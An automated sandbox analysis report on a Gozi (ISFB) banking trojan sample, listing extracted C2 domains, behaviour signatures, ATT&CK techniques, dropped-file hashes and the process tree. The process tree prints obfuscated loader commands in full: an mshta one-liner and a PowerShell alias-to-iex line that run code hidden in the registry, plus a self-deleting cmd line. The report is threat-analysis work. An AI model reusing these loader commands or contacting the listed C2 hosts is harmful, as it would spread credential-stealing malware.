gozi | f53a5dc044ad8b769397a3f6a36747cb5a66548e13ed4a7ea313337545c3c3aa

Analysis

max time kernel
152s
max time network
149s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
07-10-2023 12:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

63b506c0917d35cbf539bad3ad26d82ea3edbe50ba3f09f6e39a03c969fa8cfd.ps1
Size

172B
MD5

7b70469bba9d761d9b90c49c596575d6
SHA1

ca89ca05ee36b580f713b1e17bb4694506069622
SHA256

63b506c0917d35cbf539bad3ad26d82ea3edbe50ba3f09f6e39a03c969fa8cfd
SHA512

855656cadc203011b9ee0d66309c399e9641461682fe7cd930de076964aea976aba20919e2cea34f0b5ce8400dffd0fa44564ddd94b0746e0c6e0d74de682984

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

http://igrovdow.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 2212 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

CgKYDo.exe

pid process

2744 CgKYDo.exe

flow	pid	process
5	2212	powershell.exe

pid	process
2744	CgKYDo.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1732 set thread context of 1240	1732	powershell.exe	Explorer.EXE
PID 1240 set thread context of 2912	1240	Explorer.EXE	cmd.exe
PID 2912 set thread context of 1864	2912	cmd.exe	PING.EXE
PID 1240 set thread context of 2296	1240	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1864 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1864 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1864	PING.EXE

pid	process
1864	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeCgKYDo.exepowershell.exeExplorer.EXE

pid	process
2212	powershell.exe
2212	powershell.exe
2212	powershell.exe
2744	CgKYDo.exe
1732	powershell.exe
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1240 Explorer.EXE
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

1732 powershell.exe
1240 Explorer.EXE
2912 cmd.exe
1240 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2212 powershell.exe
Token: SeDebugPrivilege 1732 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1240 Explorer.EXE

pid	process
1240	Explorer.EXE

pid	process
1732	powershell.exe
1240	Explorer.EXE
2912	cmd.exe
1240	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	1732	powershell.exe

pid	process
1240	Explorer.EXE

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

powershell.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2212 wrote to memory of 2744	2212	powershell.exe	CgKYDo.exe
PID 2212 wrote to memory of 2744	2212	powershell.exe	CgKYDo.exe
PID 2212 wrote to memory of 2744	2212	powershell.exe	CgKYDo.exe
PID 2212 wrote to memory of 2744	2212	powershell.exe	CgKYDo.exe
PID 1980 wrote to memory of 1732	1980	mshta.exe	powershell.exe
PID 1980 wrote to memory of 1732	1980	mshta.exe	powershell.exe
PID 1980 wrote to memory of 1732	1980	mshta.exe	powershell.exe
PID 1732 wrote to memory of 1344	1732	powershell.exe	csc.exe
PID 1732 wrote to memory of 1344	1732	powershell.exe	csc.exe
PID 1732 wrote to memory of 1344	1732	powershell.exe	csc.exe
PID 1344 wrote to memory of 2480	1344	csc.exe	cvtres.exe
PID 1344 wrote to memory of 2480	1344	csc.exe	cvtres.exe
PID 1344 wrote to memory of 2480	1344	csc.exe	cvtres.exe
PID 1732 wrote to memory of 2364	1732	powershell.exe	csc.exe
PID 1732 wrote to memory of 2364	1732	powershell.exe	csc.exe
PID 1732 wrote to memory of 2364	1732	powershell.exe	csc.exe
PID 2364 wrote to memory of 1548	2364	csc.exe	cvtres.exe
PID 2364 wrote to memory of 1548	2364	csc.exe	cvtres.exe
PID 2364 wrote to memory of 1548	2364	csc.exe	cvtres.exe
PID 1732 wrote to memory of 1240	1732	powershell.exe	Explorer.EXE
PID 1732 wrote to memory of 1240	1732	powershell.exe	Explorer.EXE
PID 1732 wrote to memory of 1240	1732	powershell.exe	Explorer.EXE
PID 1240 wrote to memory of 2912	1240	Explorer.EXE	cmd.exe
PID 1240 wrote to memory of 2912	1240	Explorer.EXE	cmd.exe
PID 1240 wrote to memory of 2912	1240	Explorer.EXE	cmd.exe
PID 1240 wrote to memory of 2912	1240	Explorer.EXE	cmd.exe
PID 1240 wrote to memory of 2912	1240	Explorer.EXE	cmd.exe
PID 1240 wrote to memory of 2912	1240	Explorer.EXE	cmd.exe
PID 2912 wrote to memory of 1864	2912	cmd.exe	PING.EXE
PID 2912 wrote to memory of 1864	2912	cmd.exe	PING.EXE
PID 2912 wrote to memory of 1864	2912	cmd.exe	PING.EXE
PID 2912 wrote to memory of 1864	2912	cmd.exe	PING.EXE
PID 2912 wrote to memory of 1864	2912	cmd.exe	PING.EXE
PID 2912 wrote to memory of 1864	2912	cmd.exe	PING.EXE
PID 1240 wrote to memory of 2296	1240	Explorer.EXE	cmd.exe
PID 1240 wrote to memory of 2296	1240	Explorer.EXE	cmd.exe
PID 1240 wrote to memory of 2296	1240	Explorer.EXE	cmd.exe
PID 1240 wrote to memory of 2296	1240	Explorer.EXE	cmd.exe
PID 1240 wrote to memory of 2296	1240	Explorer.EXE	cmd.exe
PID 1240 wrote to memory of 2296	1240	Explorer.EXE	cmd.exe
PID 1240 wrote to memory of 2296	1240	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\63b506c0917d35cbf539bad3ad26d82ea3edbe50ba3f09f6e39a03c969fa8cfd.ps1
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2212

C:\Users\Admin\AppData\Local\Temp\CgKYDo.exe
"C:\Users\Admin\AppData\Local\Temp\CgKYDo.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2744

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>So8u='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(So8u).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\30BA078A-CF87-E252-D964-73361DD857CA\\\TimeContact'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jbtidso -value gp; new-alias -name xxcfcbq -value iex; xxcfcbq ([System.Text.Encoding]::ASCII.GetString((jbtidso "HKCU:Software\AppDataLow\Software\Microsoft\30BA078A-CF87-E252-D964-73361DD857CA").ChartText))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1732

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mhfamnwa.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1344

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4D27.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4D26.tmp"
5⤵
PID:2480

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xq6yhsdu.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2364

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4DC3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4DC2.tmp"
5⤵
PID:1548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\CgKYDo.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2912

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1864

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:2296

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CgKYDo.exe
Filesize
274KB

MD5
d18f3fecf6d28ddd0f4cf4a9b53c0aec

SHA1
05263b9ec69fcf48cc71443ba23545fabe21df12

SHA256
911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

SHA512
4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

Download Submit
C:\Users\Admin\AppData\Local\Temp\CgKYDo.exe
Filesize
274KB

MD5
d18f3fecf6d28ddd0f4cf4a9b53c0aec

SHA1
05263b9ec69fcf48cc71443ba23545fabe21df12

SHA256
911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

SHA512
4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

Download Submit
C:\Users\Admin\AppData\Local\Temp\CgKYDo.exe
Filesize
274KB

MD5
d18f3fecf6d28ddd0f4cf4a9b53c0aec

SHA1
05263b9ec69fcf48cc71443ba23545fabe21df12

SHA256
911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

SHA512
4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4D27.tmp
Filesize
1KB

MD5
85786faff86c8c980817eb33ef21b7b9

SHA1
06707fdbd848cc12a487bdb62847a401e52fabb4

SHA256
43dd87d12079a27fe8eaaf490b9dfc80904f9137f4622695fbe461a312e95fbf

SHA512
e5daca4ebed405580bb0f2ebe6c3941a3deaadd888e1bf6621b78058cc30b3923b494ae73ac7d84dc23beb897af94c1798ec2a92589dce0b74a2fe244cfebddc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4DC3.tmp
Filesize
1KB

MD5
6e3b6157e6ce7a24b01eb6cc065ca717

SHA1
0aef98827f1c5672025fb2c672877a09071322b9

SHA256
eaa149991711545bfba78b5650e080ff5ce48209cc06c9b3ac4317b1e084c74e

SHA512
25178eb8d1238001b8ec5015f95242818da445757ebfc53d7fcafc6bc7e167f23a07a532f99b162226b9e0c1cd15cd215f7e0c2d7327e30672892d62c2679a96

Download Submit
C:\Users\Admin\AppData\Local\Temp\mhfamnwa.dll
Filesize
3KB

MD5
30422ddea45024c510b03b0ce845f3ae

SHA1
d7368defeab5cc16b6907ddb8d95f57581fd0bcf

SHA256
3acf3646d2d5925b7cf1af1047e585d40acfc4e5937a8c9bd4b8909554c29688

SHA512
e41ee073748c7cf83d2484ab2af559694cd149709806e4570090e8b4102af046077903f4cab79d69669aca29223a7893e3d86b73530caa63986ae6708021a3c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\mhfamnwa.pdb
Filesize
7KB

MD5
7579b9c0064427239a5d21f50bb164bb

SHA1
3900773917a2898f634170f77f2493a9e6168b5e

SHA256
902c6df7e7da25b651ab7d7855b442d2055f8a04daaacece5f3dcc8cc00781f5

SHA512
ba99d181172f8bb42fdb1a335cb0a0e62d74eee3bb18deb6600e49b49b10c29a42f39b7815142f79775b4c4c4abf64846390e5e77ceffd5c1a158d5730764508

Download Submit
C:\Users\Admin\AppData\Local\Temp\xq6yhsdu.dll
Filesize
3KB

MD5
65ed13de92a1c4854472fee95be650ca

SHA1
95240a8de3e731d6e161b7eb966638df2d28e148

SHA256
bc04cdaa10faa4e4042a19ce540008b7e6a573fe103e7af9c4e50af467b16677

SHA512
929e68c4cb621cea8a3dc292e17a87b95210c0dcdfcd719a655b025b47499aa59864c0634425d20c810d69bd3527f2341e430e8d55d76f75a26f21bbdd6e3bfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\xq6yhsdu.pdb
Filesize
7KB

MD5
e8dc2e4a8e291aec476181eb798cef30

SHA1
7c8ba7773a8ffde7cbca98411406b9a3b137d08f

SHA256
3cd41a79ef6b5d3861b7fe516b6f751d15d75909203bdc47dd7a134533b42e9c

SHA512
2b6b7be6f274d48c26b0f132502ca8561515272ccf8bd1fd8df35614f5db7e34661af666fe04608d4fd9c3790a2ef88a55ee3c41b9bb613b109a0e3ca3cbcff1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
fd61fff5b26ecd390cf470435679a146

SHA1
d9f1e00e3c8710041c9e77c5141a4497a9759fd3

SHA256
00da2eb94cb834e4402ffbe8e67cb58c6fbb55b5efbfcba3cc5f221083b056b0

SHA512
e8f38f73198dd9233b8a709e58992feeecdd2e95a3ebec45d7c7d2f0c1a0899c49fd5aa6a0eed50a5f2fa44ae650d23a6338ff8ebf2502df849cae6f3027d1c7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UYQKX7SKZ5QCCF2QQDN6.temp
Filesize
7KB

MD5
caa5d5c9e9b2f712520079f2f3df9843

SHA1
a263a9e898df2dcad103f28d66a782d260fc71f7

SHA256
411036db47ab7daa4d8eb6a1f9f77042919f563bf357f2a0ca058b527ae1fd8a

SHA512
6870a92b2dcb5fd9b70a9487bbe5762f7dd3be8716fac3207bfbfaf5c872c8b9ce0d8de744c018ca37335382a075401f9bc810005a4ef753161d7598ef9e4c9e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC4D26.tmp
Filesize
652B

MD5
f1a6254a480bf399bd79be70b0a33dc2

SHA1
dff656e5bdaaab112a510b59854ec55cf1d132a0

SHA256
0fbd76d9ebd9b3f00322fd4c3e32f10d8b1e3ed4a578975726c25aac3151e89c

SHA512
15abaaabf37ad654b9c0c3dc6303a6b179a7bb2e878fcf08b416e15e61258fd044ebf780151db2c94625f86a2e4e86cd2c1780f7aecba7d53a204a9e2f8ab45f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC4DC2.tmp
Filesize
652B

MD5
ea83dbbd10fa2b747bbd0136d612ac35

SHA1
1e3865167abca50c81ae5e85ea2f0f5639c8988e

SHA256
c1e5cfafd4d2047d2ac6cc0a55c65e46222a4d6b840e8b47704a014f10412686

SHA512
6b87b4efd7310372660f3648d440e6b4d7fd2a9b9a410ab546314eb5757aff7caaa7c5cf918d5479c6f5816f88c1316789d60de2b06253d6b5db2d0dd1ec6368

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mhfamnwa.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mhfamnwa.cmdline
Filesize
309B

MD5
cfb386acc16f320736871bc992cfcfee

SHA1
f0a799780820101db89b7f7f42e3f1b2467e956f

SHA256
04c560d82ef4b7f30825454f205425fe4bd33ff5210dd99a61a20f8f35e57ab9

SHA512
04b1ecfe0e770c58671a442a7a3a94332ebe12c83d84e097c180c180eecee8490313c6a3f45c7f32c2a6e88364afc93620a001de62f23a8968329c5872e17043

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xq6yhsdu.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xq6yhsdu.cmdline
Filesize
309B

MD5
4efdc4dde7f35404eade6cceb81e9a80

SHA1
04fe7964545b7106891fc33a345bba49f23ae068

SHA256
bd7dcb8aff6f1a3272dd7cc656a0da5b47392448fd6166dc3f70b1681ad66a0a

SHA512
44461022a7f6b07c44a1e177ca2d130a0207a5a1ee7f815bd99094099a3af1c04337dbf882620e3f8b284e8fbcb16a363c0a3ff8a0ef7faa285e3b2109c66597

Download Submit
memory/1240-82-0x0000000004220000-0x00000000042C4000-memory.dmp

Filesize
656KB

Download
memory/1240-83-0x0000000002A60000-0x0000000002A61000-memory.dmp

Filesize
4KB

Download
memory/1240-113-0x0000000004220000-0x00000000042C4000-memory.dmp

Filesize
656KB

Download
memory/1732-44-0x000007FEF2B20000-0x000007FEF34BD000-memory.dmp

Filesize
9.6MB

Download
memory/1732-41-0x0000000002560000-0x0000000002568000-memory.dmp

Filesize
32KB

Download
memory/1732-42-0x000007FEF2B20000-0x000007FEF34BD000-memory.dmp

Filesize
9.6MB

Download
memory/1732-43-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/1732-61-0x000000001B1B0000-0x000000001B1B8000-memory.dmp

Filesize
32KB

Download
memory/1732-45-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/1732-46-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/1732-47-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/1732-92-0x000000001B9D0000-0x000000001BA0D000-memory.dmp

Filesize
244KB

Download
memory/1732-91-0x000007FEF2B20000-0x000007FEF34BD000-memory.dmp

Filesize
9.6MB

Download
memory/1732-40-0x000000001B250000-0x000000001B532000-memory.dmp

Filesize
2.9MB

Download
memory/1732-81-0x000000001B9D0000-0x000000001BA0D000-memory.dmp

Filesize
244KB

Download
memory/1732-78-0x000000001B1C0000-0x000000001B1C8000-memory.dmp

Filesize
32KB

Download
memory/1864-103-0x0000000000090000-0x0000000000091000-memory.dmp

Filesize
4KB

Download
memory/1864-114-0x0000000001B20000-0x0000000001BC4000-memory.dmp

Filesize
656KB

Download
memory/1864-100-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1864-102-0x0000000001B20000-0x0000000001BC4000-memory.dmp

Filesize
656KB

Download
memory/2212-4-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download
memory/2212-18-0x000007FEF5370000-0x000007FEF5D0D000-memory.dmp

Filesize
9.6MB

Download
memory/2212-10-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/2212-9-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/2212-8-0x000007FEF5370000-0x000007FEF5D0D000-memory.dmp

Filesize
9.6MB

Download
memory/2212-5-0x00000000025F0000-0x00000000025F8000-memory.dmp

Filesize
32KB

Download
memory/2212-7-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/2212-6-0x000007FEF5370000-0x000007FEF5D0D000-memory.dmp

Filesize
9.6MB

Download
memory/2296-107-0x0000000000160000-0x00000000001F8000-memory.dmp

Filesize
608KB

Download
memory/2296-108-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/2296-111-0x0000000000160000-0x00000000001F8000-memory.dmp

Filesize
608KB

Download
memory/2364-72-0x00000000020E0000-0x0000000002160000-memory.dmp

Filesize
512KB

Download
memory/2364-112-0x00000000020E0000-0x0000000002160000-memory.dmp

Filesize
512KB

Download
memory/2744-28-0x0000000000400000-0x000000000228B000-memory.dmp

Filesize
30.5MB

Download
memory/2744-33-0x00000000042A0000-0x00000000042A2000-memory.dmp

Filesize
8KB

Download
memory/2744-23-0x0000000000310000-0x000000000031D000-memory.dmp

Filesize
52KB

Download
memory/2744-22-0x0000000000400000-0x000000000228B000-memory.dmp

Filesize
30.5MB

Download
memory/2744-20-0x0000000002300000-0x0000000002400000-memory.dmp

Filesize
1024KB

Download
memory/2744-26-0x0000000002300000-0x0000000002400000-memory.dmp

Filesize
1024KB

Download
memory/2744-21-0x00000000002A0000-0x00000000002AB000-memory.dmp

Filesize
44KB

Download
memory/2744-27-0x00000000002A0000-0x00000000002AB000-memory.dmp

Filesize
44KB

Download
memory/2912-95-0x0000000000310000-0x0000000000311000-memory.dmp

Filesize
4KB

Download
memory/2912-94-0x00000000004B0000-0x0000000000554000-memory.dmp

Filesize
656KB

Download
memory/2912-93-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

Filesize
4KB

Download
memory/2912-116-0x00000000004B0000-0x0000000000554000-memory.dmp

Filesize
656KB

Download